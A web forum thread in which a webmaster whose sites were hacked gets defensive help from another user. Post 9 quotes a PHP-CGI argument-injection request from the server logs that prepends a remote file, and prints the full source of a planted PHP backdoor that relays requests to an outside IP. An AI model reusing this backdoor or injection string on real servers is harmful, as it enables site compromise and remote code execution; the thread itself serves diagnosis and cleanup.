MajorGeeks Support Forums

Go Back   MajorGeeks Support Forums > ----------= PC, Desktop and Laptop Support =---------- > Software
Register FAQ Members List Calendar Casino Mark Forums Read

Software Software such as operating systems like Windows XP, Windows Vista, Windows 7 etc., or specific programs.


Reply
 
Thread Tools Display Modes
  #1  
Old 06-11-12, 18:57
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Exclamation security problems

it seems like every one of my websites which I have saved passwords for within Filezilla (my ftp client) have been hacked.

code has either been inserted into php files and or the htaccess files have been altered so that clicking a link from google to my pages redirects to someone else's website.

My question is do you think that there is a connection between having the passwords saved and the sites being hacked? Does this sound like my computer has a virus?

I also just noticed that when I delete, or copy/paste a file I need to manually refresh for it to show up or disappear.

As for my websites, I did the coding myself and have been lazy on some of my websites where information can be inputted, does it sound like somebody is just taking advantage of that?

Aside from Form inputs, I use javascript http calls often on my websites and it would not be hard to look at the script to see the website address along with the GET array being passed. Do you think that this would be a vulnerability as well?

Other than those two things (form inputs, and GET arrays) can anyone point out some other areas I may need to secure? I have quite a few websites to go through and secure. I want to make a check list of all areas I need to secure. For instance, would my file permissions have anything to do with this?

thanks for any advice.
Reply With Quote
Sponsored links
  #2  
Old 06-11-12, 21:42
PC-XT's Avatar
PC-XT PC-XT is offline
Master Sergeant
 
Join Date: Oct 2007
Location: on a farm
Posts: 646
Thanks: 27
Thanked 80 Times in 74 Posts
Default Re: security problems

To check for spyware on your computer, follow the instructions in the READ & RUN ME FIRST Malware Removal Guide

A good help in securing your sites using GET requests is often to look at the log files for strange things like SQL or PHP code to know what people have tried. If they have gained enough access, they can change the log files, though, so this isn't always accurate.

The way to secure user input is to not use any user value, (even select boxes or checkboxes, which can be edited by those who know how,) until it's been filtered for SQL, PHP, JavaScript, VBScript, CSS, HTML, or any other languages the variable may come in contact with. (Filter on the server. Filtering in the client can be bypassed.) If it's a number, parsing it into a numeric variable is usually sufficient. Never insert a raw input directly into SQL, eval, or the like, because that will make injection attacks very easy.

Searching for "protecting against php injection attacks" will give a lot of advice. It's good to look at more than a few pages, because they too often miss some small thing that an attacker won't.
__________________
I.think(code);
I.eat(code.spaghetti);

Last edited by PC-XT; 06-11-12 at 21:48..
Reply With Quote
  #3  
Old 06-11-12, 22:09
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

Thank you for the information, I will go read around right now.

By the way I do have a good idea how I can secure the inputs, I am mainly wondering if anyone knows of any common ways besides address GET and form GET and POST inputting that I should be aware of?
Reply With Quote
  #4  
Old 06-12-12, 08:27
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

Hey guys I have a quick question while I am going through the README & RUNME FIRST

I was just checking my list of start up items and I noticed a weird one: 'Ruabomgu'

which runs command 'C:\Users\xyz\AppData\Roaming\Sygegy\ihig.exe'

I checked inside of the Roaming folder and noticed that a lot of my programs which require passwords, including my FTP program which I think someone stole my passwords from are all listed in the Roaming folder. Is the roaming folder a vulnerability?

I would imagine that the README & RUNME FIRST might fix this, I am just trying to understand how they got my information.
Reply With Quote
  #5  
Old 06-12-12, 16:13
PC-XT's Avatar
PC-XT PC-XT is offline
Master Sergeant
 
Join Date: Oct 2007
Location: on a farm
Posts: 646
Thanks: 27
Thanked 80 Times in 74 Posts
Default Re: security problems

I can't find anything about Ruabomgu or Sygegy, so I assume it's not a common startup item, and the names sound suspicious. If, for some reason, the READ & RUN ME FIRST guide doesn't take care of it, ask in the malware section, attaching the logs. Approved volunteer malware experts give one-on-one help there, as they have time. It's the best free help for this stuff that I've found.


Alternative inputs:
You can input via http headers using AJAX, but they are less compatible with some implementations, and they aren't usually used to transfer large blocks of information. I've also heard of using custom methods in forms, but it's still basically the same as GET or POST.

The way input is received doesn't really matter in server security, since someone who knows how can still change the inputs at will. Changing the method will just delay this. The server should filter all the inputs as if they could contain malicious code before using them, regardless of how they arrived.
__________________
I.think(code);
I.eat(code.spaghetti);
Reply With Quote
Sponsored links
  #6  
Old 06-12-12, 21:52
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

When you say that the server should filter it, do you mean server-side coding (php) instead of front end (javascript) ?

I am asking because my hosting company is telling me that the security has nothing to do with their servers and everything to do with the code being vulnerable.
Reply With Quote
  #7  
Old 06-13-12, 22:50
PC-XT's Avatar
PC-XT PC-XT is offline
Master Sergeant
 
Join Date: Oct 2007
Location: on a farm
Posts: 646
Thanks: 27
Thanked 80 Times in 74 Posts
Default Re: security problems

Yes. When I said server, I meant the code that takes the relevant input, processes it, and replies to the client. It's good to validate stuff with JavaScript, too, but the server (whatever code uses the validated stuff) can't rely on it actually being validated. I don't know if that is an issue with your code, but I see too many vulnerabilities in general from this, so I mentioned it. It's more of a problem with AJAX, because JavaScript must be turned on for it to work, so it's easier to rely on it too much, forgetting that it can be circumvented.

Sorry for the confusion. I hope it's not too hard to get rid of the spyware, if that's what it is, and any code vulnerabilities.
__________________
I.think(code);
I.eat(code.spaghetti);
Reply With Quote
  #8  
Old 06-13-12, 23:22
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

PC-XT, thank you very much for the help. I did have a trojan virus on my computer but it was easy to get rid of.

My websites had about 30 htaccess files and code inserts throughout.

As for using javascript, do you just mean like urlencode? or what else would you do?
Reply With Quote
  #9  
Old 06-14-12, 01:25
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Exclamation Re: security problems

quick update..I was searching through my log files today after restoring my pages and adding some security features. One of the lines caught my eye:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346


that specific index file does not use the GET array. it looks suspect to me but I am not exactly sure what it is doing. the info3.txt looked like the end of a file so I went searching through my directories for it, I did not find it. But I did find what appears to be a trojan gateway type of PHP file which I did not create. it was called "ok.php" I am trying to understand how someone can add a PHP file to my website, would they need my password or is some type of cross browser scripting possible to create a new php file like this:


<?php
//URL о€игиналŒного �е€ве€а.
$url = "http://77.91.204.236/celka/update.php";

@error_reporting(0); @set_time_limit(0);

//šоннек‚им�� к о€игиналŒномƒ �е€ве€ƒ.
$url = @parse_url($url);
if(!isset($url['port']))$url['port'] = 80;
if(($real_server = @fsockopen($url['host'], $url['port'])) === false)die('E1');

//Ÿолƒ‡аем данн‹е дл� пе€е�‹лки.
if(($data = @file_get_contents('php://input')) === false)$data = '';

//Фо€ми€ƒем зап€о�.
$request = "POST {$url['path']}?ip=".urlencode($_SERVER['REMOTE_ADDR'])." HTTP/1.1\r\n";
$request .= "Host: {$url['host']}\r\n";

if(!empty($_SERVER['HTTP_USER_AGENT']))$request .= "User-Agent: {$_SERVER['HTTP_USER_AGENT']}\r\n";

//$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Content-Length: ".strlen($data)."\r\n";
$request .= "Connection: Close\r\n";

//ž‚п€авл�ем.
fwrite($real_server, $request."\r\n".$data);

//Ÿолƒ‡аем о‚ве‚.
$result = '';
while(!feof($real_server))$result .= fread($real_server, 1024);
fclose($real_server);

//’‹водим о‚ве‚.
echo substr($result, strpos($result, "\r\n\r\n") + 4);
?>



EDIT: I did a search on that last bit:
http%3A%2F%2F81.17.24.83%2Finfo3.txt
which when I looked at it closer is clearly:
http://81.17.24.83/info3.txt

they are talking about cross browser scripting attempts using the same line that I am seeing in my log file. anyone familiar with how they get that back door file onto your site in the first place? is that the same as XSS?

Last edited by gamecoding27; 06-14-12 at 01:34..
Reply With Quote
  #10  
Old 06-14-12, 01:39
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

bingo: http://81.17.24.83/info2.txt - i just started changing the number on info#.txt and came across that file.
it is the code that has been getting inserted into my files.
Reply With Quote
Sponsored links
  #11  
Old 06-14-12, 20:33
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Exclamation Re: security problems

guys do not open the website link that I posted: http://81.17.24.83/info2.txt

it believe it gave me a trojan when I went to it, plus they got my IP and started attacking my computer...

i just ran superantivirus and re-installed mozilla. it seems that mozilla and chrome are both hijacked. when I try to come to this website, "majorgeeks.com" i am sent to hotmail login.

internet explorer is the only browser I can get to come here
Reply With Quote
  #12  
Old 06-15-12, 00:46
PC-XT's Avatar
PC-XT PC-XT is offline
Master Sergeant
 
Join Date: Oct 2007
Location: on a farm
Posts: 646
Thanks: 27
Thanked 80 Times in 74 Posts
Default Re: security problems

Sometimes leaving your modem off for a while will change your ip. http://forums.majorgeeks.com/showthread.php?t=223570

The Malware Removal section helps with hijacked or redirecting browsers, too.

The -d switches in the url were attempts to override options in the php.ini file, like using ini_set(). I don't know if they were successful or not. You could try overriding a php.ini option in this way for a test php file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value
I found the same attack on another site. Since the given file apparently doesn't exist, it's probably just used to mark the ip as vulnerable to attack.

It is possible to use php injection to add a file, if they can get php code to execute.

By JavaScript validation, I mean checking that things sent to the server are in the right range and format that is expected by the server, so that it doesn't need to send as many error messages. It saves time and bandwidth, but technically doesn't improve security. The server code should still do the same checks, either way.
__________________
I.think(code);
I.eat(code.spaghetti);
Reply With Quote
  #13  
Old 06-15-12, 02:53
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Exclamation Re: security problems

PC-XT, thanks for responding again.

I talked to my internet company and they told me it resets every 24 hours but they reset it for me right then.

The malware removal section cleared the hijacked browsers right up (specifically combo fix)

in my php.ini file all of the variables they are trying to manipulate are set at the values they are trying to set, besides the "-dauto_prepend_file" which is NULL

Do you know what safe mode is? is it normally on?
Reply With Quote
  #14  
Old 06-15-12, 02:59
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

PC-XT thanks for responding again.

The malware removal got rid of the browser problem with no problems. specifically combo fix.

I contacted my internet company and they told me that my IP changes every 24 hours but they changed it right then to be safe.

It looks like all of the values are set like they want in the php.ini with the -d switches they are running. except for the last one with the url. -dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Finfo3.txt HTTP/1.1" 200 8346

those don't seem like safe settings but I am not familiar with what those values were before they were messing with them.

I will do like you said and test that command myself.
Reply With Quote
  #15  
Old 06-15-12, 03:13
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

Quote:
You could try overriding a php.ini option in this way for a test php file that just displays their values to see if it's a vulnerability:
.../test.php?-doption=value
PC-XT thank you for responding again. When you say that those switches override them, do you mean that they will change the values in the file? or just "override" the value in the file or ignore it and use the value they are passing in?

and when you say to test the values, would you just do php_info() or what do you mean?

thanks for all of the other detail too
Reply With Quote
Sponsored links
  #16  
Old 06-15-12, 21:37
PC-XT's Avatar
PC-XT PC-XT is offline
Master Sergeant
 
Join Date: Oct 2007
Location: on a farm
Posts: 646
Thanks: 27
Thanked 80 Times in 74 Posts
Default Re: security problems

I'm glad to hear problems are getting fixed.

safe mode is off by default, unless the host requires it to be on. I believe it has been removed from the latest version of PHP. It was sort of a hack to correct for systems that didn't provide adequate security.
http://www.php.net/manual/en/features.safe-mode.php
http://www.php.net/manual/en/feature....functions.php
http://www.php.net/manual/en/ini.sect.safe-mode.php
http://docs.joomla.org/Why_shouldn%2...P_safe_mode%3F

As for the test PHP file, it could be just
<?php
echo(ini_get('safe_mode'));
?>
with whatever settings you are trying to override via the -d switch. If it does override settings, I think it's just for that particular time the script and any included files are called, ignoring the ini file, but I'm not sure. The command line options are listed here, but they may work differently in a url, if they even work at all:
http://www.php.net/manual/en/feature...ne.options.php

This might be another test file:
<?php
phpinfo(4);
?>
I'm not sure which is best.
__________________
I.think(code);
I.eat(code.spaghetti);

Last edited by PC-XT; 06-15-12 at 21:47.. Reason: added phpinfo ini section example
Reply With Quote
  #17  
Old 06-16-12, 04:26
gamecoding27 gamecoding27 is offline
Private E-2
 
Join Date: Jun 2012
Posts: 18
Thanks: 0
Thanked 1 Time in 1 Post
Default Re: security problems

PC-XT, thanks again for all of your help buddy. someone passed me along this link: https://bugs.php.net/bug.php?id=61910

it turns out that it was fixed in a recent php patch. For anyone on an older version of php (or non apache i think) there is a htaccess bit in the comments that prevents the -d -s and other switches from being used in the URL
Reply With Quote
The Following User Says Thank You to gamecoding27 For This Useful Post:
PC-XT (06-19-12)
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
AV Security Suite Problems burtysoft Malware Removal 3 11-15-10 09:24
IE security problems geek_love Software 0 04-05-08 17:36
Security Center Problems drum_bum04 Software 3 01-18-08 18:34
Security Problems with PhP Postnuke daemonchild Software 0 07-27-05 12:58
Problems with Security Udates. harry Software 1 03-12-04 10:06


All times are GMT -5. The time now is 14:18.

MajorGeeks.Com Menu

MajorGeeks.Com \ All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ NEW! PC Games \ System Tools \ Macintosh \ Demonews.Com \ Top Downloads

MajorGeeks.Com \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds


All content Copyright MajorGeeks.com source code Powered by vBulletin® Version 3.8.4
Copyright © 2009 vBulletin Solutions, Inc. All rights reserved.
Ad Management by RedTyger